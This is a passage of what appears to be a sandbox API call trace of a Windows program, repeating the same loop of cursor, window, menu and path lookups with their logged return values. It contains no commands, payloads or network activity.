param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.667] GetStockObject (i=6) returned 0x1b00018 [0027.667] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.667] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.667] PathFileExistsW (pszPath=0x0) returned 0 [0027.667] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.667] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.668] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.668] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.668] GetMenu (hWnd=0x0) returned 0x0 [0027.668] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1a0) returned -1 [0027.668] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.668] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.668] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.668] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.668] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.668] GetStockObject (i=6) returned 0x1b00018 [0027.668] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.668] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.668] PathFileExistsW (pszPath=0x0) returned 0 [0027.668] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.668] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.668] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.668] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.668] GetMenu (hWnd=0x0) returned 0x0 [0027.668] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.668] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.668] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.668] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.668] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.668] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.668] GetStockObject (i=6) returned 0x1b00018 [0027.668] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.668] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.668] PathFileExistsW (pszPath=0x0) returned 0 [0027.668] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.668] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.669] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.669] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.669] GetMenu (hWnd=0x0) returned 0x0 [0027.669] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.669] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.669] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.669] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.669] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.669] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.669] GetStockObject (i=6) returned 0x1b00018 [0027.669] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.669] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.669] PathFileExistsW (pszPath=0x0) returned 0 [0027.669] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.669] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.669] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.669] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.669] GetMenu (hWnd=0x0) returned 0x0 [0027.669] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.669] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.669] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.669] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.669] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.669] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.669] GetStockObject (i=6) returned 0x1b00018 [0027.669] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.669] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.669] PathFileExistsW (pszPath=0x0) returned 0 [0027.669] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.669] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.669] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.669] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.670] GetMenu (hWnd=0x0) returned 0x0 [0027.670] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.670] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.670] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.670] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.670] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.670] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.670] GetStockObject (i=6) returned 0x1b00018 [0027.670] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.670] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.670] PathFileExistsW (pszPath=0x0) returned 0 [0027.670] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.670] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.670] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.670] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.670] GetMenu (hWnd=0x0) returned 0x0 [0027.670] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x72) returned -1 [0027.670] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.670] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.670] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.670] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.670] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.670] GetStockObject (i=6) returned 0x1b00018 [0027.670] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.670] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.670] PathFileExistsW (pszPath=0x0) returned 0 [0027.670] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.670] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.670] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.670] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.670] GetMenu (hWnd=0x0) returned 0x0 [0027.670] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.670] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.670] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.671] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.671] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.671] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.671] GetStockObject (i=6) returned 0x1b00018 [0027.671] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.671] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.671] PathFileExistsW (pszPath=0x0) returned 0 [0027.671] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.671] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.671] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.671] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.671] GetMenu (hWnd=0x0) returned 0x0 [0027.671] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.671] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.671] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.671] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.671] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.671] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.671] GetStockObject (i=6) returned 0x1b00018 [0027.671] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.671] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.671] PathFileExistsW (pszPath=0x0) returned 0 [0027.671] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.671] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.671] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.671] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.671] GetMenu (hWnd=0x0) returned 0x0 [0027.671] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.671] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.671] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.671] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.671] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.672] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.672] GetStockObject (i=6) returned 0x1b00018 [0027.672] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.672] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.672] PathFileExistsW (pszPath=0x0) returned 0 [0027.672] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.672] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.672] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.672] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.672] GetMenu (hWnd=0x0) returned 0x0 [0027.672] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.672] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.672] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.672] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.672] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.672] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.672] GetStockObject (i=6) returned 0x1b00018 [0027.672] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.672] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.672] PathFileExistsW (pszPath=0x0) returned 0 [0027.672] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.672] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.672] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.672] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.672] GetMenu (hWnd=0x0) returned 0x0 [0027.672] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x22c) returned -1 [0027.672] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.672] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.672] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.672] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.672] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.673] GetStockObject (i=6) returned 0x1b00018 [0027.673] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.673] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.673] PathFileExistsW (pszPath=0x0) returned 0 [0027.673] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.673] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.673] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.673] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.673] GetMenu (hWnd=0x0) returned 0x0 [0027.673] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.673] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.673] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.673] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.673] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.673] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.673] GetStockObject (i=6) returned 0x1b00018 [0027.673] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.673] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.673] PathFileExistsW (pszPath=0x0) returned 0 [0027.673] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.673] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.673] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.673] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.673] GetMenu (hWnd=0x0) returned 0x0 [0027.673] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.673] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.673] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.673] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.673] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.673] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.673] GetStockObject (i=6) returned 0x1b00018 [0027.673] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.673] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.673] PathFileExistsW (pszPath=0x0) returned 0 [0027.674] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.674] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.674] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.674] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.674] GetMenu (hWnd=0x0) returned 0x0 [0027.674] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.674] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.674] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.674] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.674] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.674] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.674] GetStockObject (i=6) returned 0x1b00018 [0027.674] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.674] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.674] PathFileExistsW (pszPath=0x0) returned 0 [0027.674] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.674] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.674] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.674] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.674] GetMenu (hWnd=0x0) returned 0x0 [0027.674] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.674] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.674] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.674] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.674] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.674] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.674] GetStockObject (i=6) returned 0x1b00018 [0027.674] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.674] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.674] PathFileExistsW (pszPath=0x0) returned 0 [0027.674] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.674] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.675] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.675] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.675] GetMenu (hWnd=0x0) returned 0x0 [0027.675] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x36c) returned -1 [0027.675] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.675] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.675] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.675] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.675] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.675] GetStockObject (i=6) returned 0x1b00018 [0027.675] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.675] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.675] PathFileExistsW (pszPath=0x0) returned 0 [0027.675] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.675] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.675] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.675] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.675] GetMenu (hWnd=0x0) returned 0x0 [0027.675] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.675] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.675] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.675] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.675] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.675] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.675] GetStockObject (i=6) returned 0x1b00018 [0027.675] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.675] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.675] PathFileExistsW (pszPath=0x0) returned 0 [0027.675] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.675] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.675] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.675] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.675] GetMenu (hWnd=0x0) returned 0x0 [0027.675] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.676] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.676] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.676] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.676] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.676] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.676] GetStockObject (i=6) returned 0x1b00018 [0027.676] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.676] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.676] PathFileExistsW (pszPath=0x0) returned 0 [0027.676] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.676] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.676] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.676] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.676] GetMenu (hWnd=0x0) returned 0x0 [0027.676] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.676] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.676] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.676] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.676] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.676] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.676] GetStockObject (i=6) returned 0x1b00018 [0027.676] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.676] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.676] PathFileExistsW (pszPath=0x0) returned 0 [0027.676] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.676] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.676] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.676] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.676] GetMenu (hWnd=0x0) returned 0x0 [0027.676] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.676] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.676] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.676] GetSubMenu 